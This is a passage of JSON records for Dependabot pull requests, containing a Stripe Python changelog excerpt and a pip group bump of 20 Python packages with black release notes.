\u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003emandate\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail.Twint\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail.Twint\u003c/code\u003e, and \u003ccode\u003ePaymentRecord.PaymentMethodDetail.Twint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003ePaymentIntentConfirmParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParams.excluded_payment_method_types\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParams.excluded_payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eChange type of \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e from \u003ccode\u003eliteral('none')\u003c/code\u003e to \u003ccode\u003eenum('none'|'off_session')\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enum \u003ccode\u003echeckout.SessionCreateParams.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Change type of \u003ccode\u003eCheckout.Session.PaymentMethodOption.Twint.setup_future_usage\u003c/code\u003e and \u003ccode\u003ePaymentIntent.PaymentMethodOption.Twint.setup_future_usage\u003c/code\u003e from \u003ccode\u003eliteral('none')\u003c/code\u003e to \u003ccode\u003eenum('none'|'off_session')\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum.type\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eConfirmationToken.PaymentMethodPreview.type\u003c/code\u003e and \u003ccode\u003ePaymentMethod.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eCustomerListPaymentMethodsParams.type\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams.type\u003c/code\u003e, and \u003ccode\u003ePaymentMethodListParams.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecredited_items\u003c/code\u003e on \u003ccode\u003eInvoiceItem.ProrationDetail\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003etwint\u003c/code\u003e on enums \u003ccode\u003eInvoiceCreateParamsPaymentSetting.payment_method_types\u003c/code\u003e, \u003ccode\u003eInvoiceModifyParamsPaymentSetting.payment_method_types\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParamsPaymentSetting.payment_method_types\u003c/code\u003e, and \u003ccode\u003eSubscriptionModifyParamsPaymentSetting.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ediscountable\u003c/code\u003e on \u003ccode\u003eInvoiceCreatePreviewParamsScheduleDetailPhaseAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParamsAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionModifyParamsAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionSchedule.Phase.AddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionScheduleCreateParamsPhaseAddInvoiceItem\u003c/code\u003e, and \u003ccode\u003eSubscriptionScheduleModifyParamsPhaseAddInvoiceItem\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebilling_schedules\u003c/code\u003e on \u003ccode\u003eInvoiceCreatePreviewParamsSubscriptionDetail\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParams\u003c/code\u003e, \u003ccode\u003eSubscriptionModifyParams\u003c/code\u003e, and \u003ccode\u003eSubscription\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003emax_billed_until\u003c/code\u003e on enums \u003ccode\u003eInvoiceCreatePreviewParamsSubscriptionDetail.cancel_at\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParams.cancel_at\u003c/code\u003e, and \u003ccode\u003eSubscriptionModifyParams.cancel_at\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eamount_paid_off_stripe\u003c/code\u003e on \u003ccode\u003eInvoice\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003etwint\u003c/code\u003e on enums \u003ccode\u003eInvoice.PaymentSetting.payment_method_types\u003c/code\u003e and \u003ccode\u003eSubscription.PaymentSetting.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003etwint\u003c/code\u003e on \u003ccode\u003eMandate.PaymentMethodDetail\u003c/code\u003e and \u003ccode\u003eSetupAttempt.PaymentMethodDetail\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003emetadata\u003c/code\u003e on \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003eSubscription.PendingUpdate\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003epayment_data\u003c/code\u003e on \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003ePaymentIntent.excluded_payment_method_types\u003c/code\u003e and \u003ccode\u003eSetupIntent.excluded_payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eblik_authorize\u003c/code\u003e on \u003ccode\u003ePaymentIntent.NextAction\u003c/code\u003e and \u003ccode\u003eSetupIntent.NextAction\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003epayment_method_options\u003c/code\u003e on \u003ccode\u003ePaymentLinkCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentLinkModifyParams\u003c/code\u003e, and \u003ccode\u003ePaymentLink\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003ebizum\u003c/code\u003e on enums \u003ccode\u003ePaymentLinkCreateParams.payment_method_types\u003c/code\u003e and \u003ccode\u003ePaymentLinkModifyParams.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003ebizum\u003c/code\u003e on enum \u003ccode\u003ePaymentLink.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eactive\u003c/code\u003e on \u003ccode\u003ePaymentMethodConfigurationListParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebilled_until\u003c/code\u003e on \u003ccode\u003eSubscriptionItem\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ediscount\u003c/code\u003e and \u003ccode\u003ediscounts\u003c/code\u003e on \u003ccode\u003eSubscription.PendingUpdate\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on \u003ccode\u003eTerminal.Configuration\u003c/code\u003e, \u003ccode\u003eterminal.ConfigurationCreateParams\u003c/code\u003e, and \u003ccode\u003eterminal.ConfigurationModifyParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003esimulated_verifone_m425\u003c/code\u003e, \u003ccode\u003esimulated_verifone_p630\u003c/code\u003e, \u003ccode\u003esimulated_verifone_ux700\u003c/code\u003e, \u003ccode\u003esimulated_verifone_v660p\u003c/code\u003e, \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on enum \u003ccode\u003eterminal.ReaderListParams.device_type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eapi_error\u003c/code\u003e and \u003ccode\u003eprint_content\u003c/code\u003e on \u003ccode\u003eTerminal.Reader.Action\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eprint_content\u003c/code\u003e on enum \u003ccode\u003eTerminal.Reader.Action.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003esimulated_verifone_m425\u003c/code\u003e, \u003ccode\u003esimulated_verifone_p630\u003c/code\u003e, \u003ccode\u003esimulated_verifone_ux700\u003c/code\u003e, \u003ccode\u003esimulated_verifone_v660p\u003c/code\u003e, \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on enum \u003ccode\u003eTerminal.Reader.device_type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecustomer\u003c/code\u003e on \u003ccode\u003etest_helpers.TestClockCreateParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003e2026-05-27.dahlia\u003c/code\u003e on enum \u003ccode\u003eWebhookEndpointCreateParams.api_version\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003esigner\u003c/code\u003e on \u003ccode\u003eV2.Core.Account.Identity.BusinessDetail.Document.ProofOfRegistration\u003c/code\u003e, \u003ccode\u003eV2.Core.Account.Identity.BusinessDetail.Document.ProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountCreateParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, \u003ccode\u003ev2.core.AccountCreateParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountModifyParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, \u003ccode\u003ev2.core.AccountModifyParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountTokenCreateParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, and \u003ccode\u003ev2.core.AccountTokenCreateParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eazure_event_grid\u003c/code\u003e on \u003ccode\u003eV2.Core.EventDestination\u003c/code\u003e and \u003ccode\u003ev2.core.EventDestinationCreateParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eno_azure_partner_topic_exists\u003c/code\u003e on enum \u003ccode\u003eV2.Core.EventDestination.StatusDetail.Disabled.reason\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eazure_event_grid\u003c/code\u003e on enum \u003ccode\u003eV2.Core.EventDestination.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003eazure_event_grid\u003c/code\u003e on enum \u003ccode\u003ev2.core.EventDestinationCreateParams.type\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/stripe/stripe-python/blob/master/CHANGELOG.md\"\u003estripe's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e15.2.0 - 2026-05-27\u003c/h2\u003e\n\u003cp\u003eThis release changes the pinned API version to 2026-05-27.dahlia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/stripe/stripe-python/pull/1816\"\u003e#1816\u003c/a\u003e Update generated code\n\u003cul\u003e\n\u003cli\u003eAdd support for new resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecreate\u003c/code\u003e and \u003ccode\u003eretrieve\u003c/code\u003e methods on resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum_payments\u003c/code\u003e and \u003ccode\u003escalapay_payments\u003c/code\u003e on \u003ccode\u003eAccount.Capability\u003c/code\u003e, \u003ccode\u003eAccountCreateParamsCapability\u003c/code\u003e, and \u003ccode\u003eAccountModifyParamsCapability\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eautomatic_transfer_rules_by_currency\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.Payout\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentPayout\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003estart_of_day\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.SettlementTiming\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentSettlementTiming\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003edescription\u003c/code\u003e on \u003ccode\u003eChargeCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eSetupIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003escalapay\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eCheckout.Session.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003cc...\n\n_Description has been truncated_","html_url":"https://github.com/Paciolus/Paciolus/pull/150","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Paciolus%2FPaciolus/issues/150","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/150/packages"},{"uuid":"4559655873","node_id":"PR_kwDOK7Bgbc7hL-cF","number":374,"state":"closed","title":"Bump the pip group across 1 directory with 20 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-15T00:34:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T01:15:42.000Z","updated_at":"2026-06-15T00:34:46.000Z","time_to_close":1207143,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":20,"packages":[{"name":"black","old_version":"26.3.1","new_version":"26.5.1","repository_url":"https://github.com/psf/black"},{"name":"cachetools","old_version":"7.1.1","new_version":"7.1.4","repository_url":"https://github.com/tkem/cachetools"},{"name":"certifi","old_version":"2026.4.22","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"click","old_version":"8.3.3","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"fastapi","old_version":"0.136.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"fastapi-cloud-cli","old_version":"0.17.1","new_version":"0.18.0","repository_url":"https://github.com/fastapilabs/fastapi-cloud-cli"},{"name":"httptools","old_version":"0.7.1","new_version":"0.8.0","repository_url":"https://github.com/MagicStack/httptools"},{"name":"idna","old_version":"3.13","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"pydantic-settings","old_version":"2.14.0","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"pydantic-core","old_version":"2.46.4","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-ldap","old_version":"3.4.5","new_version":"3.4.7","repository_url":"https://github.com/python-ldap/python-ldap"},{"name":"python-multipart","old_version":"0.0.27","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"rich-toolkit","old_version":"0.19.7","new_version":"0.19.10"},{"name":"sentry-sdk","old_version":"2.59.0","new_version":"2.61.0","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"starlette","old_version":"1.0.0","new_version":"1.2.1","repository_url":"https://github.com/Kludex/starlette"},{"name":"typer","old_version":"0.25.1","new_version":"0.26.4","repository_url":"https://github.com/fastapi/typer"},{"name":"uvicorn","old_version":"0.46.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"watchfiles","old_version":"1.1.1","new_version":"1.2.0","repository_url":"https://github.com/samuelcolvin/watchfiles"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `26.3.1` | `26.5.1` |\n| [cachetools](https://github.com/tkem/cachetools) | `7.1.1` | `7.1.4` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.4.22` | `2026.5.20` |\n| [click](https://github.com/pallets/click) | `8.3.3` | `8.4.1` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.1` | `0.136.3` |\n| [fastapi-cloud-cli](https://github.com/fastapilabs/fastapi-cloud-cli) | `0.17.1` | `0.18.0` |\n| [httptools](https://github.com/MagicStack/httptools) | `0.7.1` | `0.8.0` |\n| [idna](https://github.com/kjd/idna) | `3.13` | `3.17` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.14.0` | `2.14.1` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.46.4` | `2.47.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-ldap](https://github.com/python-ldap/python-ldap) | `3.4.5` | `3.4.7` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.27` | `0.0.30` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| rich-toolkit | `0.19.7` | `0.19.10` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.59.0` | `2.61.0` |\n| [starlette](https://github.com/Kludex/starlette) | `1.0.0` | `1.2.1` |\n| [typer](https://github.com/fastapi/typer) | `0.25.1` | `0.26.4` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.46.0` | `0.48.0` |\n| [watchfiles](https://github.com/samuelcolvin/watchfiles) | `1.1.1` | `1.2.0` |\n\n\nUpdates `black` from 26.3.1 to 26.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e26.5.1\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix unstable formatting of annotated assignments whose subscript annotation contains\nan inline comment (e.g. \u003ccode\u003ex: list[  # pyright: ignore[...]\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve inline comments (including \u003ccode\u003e# type: ignore\u003c/code\u003e) immediately before a\n\u003ccode\u003e# fmt: skip\u003c/code\u003e line, avoiding AST equivalence failures (\u003ca href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect the version in the published executables (\u003ca href=\"https://redirect.github.com/psf/black/issues/5137\"\u003e#5137\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Neovim integration guide covering conform.nvim, ALE, and simple command approaches\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e26.5.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for unpacking in comprehensions (PEP 798) and for lazy imports (PEP 810),\nboth new syntactic features in Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePython 3.15 is now supported. Compiled wheels are not yet provided for Python 3.15, so\nperformance may be slower than on existing Python versions. Wheels will be provided\nonce Python 3.15 is later in its release cycle. (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ccode\u003e# fmt: skip\u003c/code\u003e being ignored in nested \u003ccode\u003eif\u003c/code\u003e expressions with parenthesized \u003ccode\u003ein\u003c/code\u003e\nclauses (\u003ca href=\"https://redirect.github.com/psf/black/issues/4903\"\u003e#4903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd syntactic support for Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when an f-string follows a \u003ccode\u003e# fmt: off\u003c/code\u003e comment inside brackets (\u003ca href=\"https://redirect.github.com/psf/black/issues/5097\"\u003e#5097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve multiline compound statement headers when \u003ccode\u003e# fmt: skip\u003c/code\u003e is placed on the\ncolon line (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove heuristics around whether blank lines should appear before, within and after\ngroups of same-name decorated functions (such as \u003ccode\u003e@overload\u003c/code\u003e groups) in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5021\"\u003e#5021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix blank lines being removed between a function and a decorated class in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5092\"\u003e#5092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent string merger from creating unsplittable long lines when a pragma comment\n(e.g. \u003ccode\u003e# type: ignore\u003c/code\u003e) follows the closing bracket (\u003ca href=\"https://redirect.github.com/psf/black/issues/5096\"\u003e#5096\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRun CI on 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOutput\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 26.5.1\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix unstable formatting of annotated assignments whose subscript annotation contains\nan inline comment (e.g. \u003ccode\u003ex: list[  # pyright: ignore[...]\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve inline comments (including \u003ccode\u003e# type: ignore\u003c/code\u003e) immediately before a\n\u003ccode\u003e# fmt: skip\u003c/code\u003e line, avoiding AST equivalence failures (\u003ca 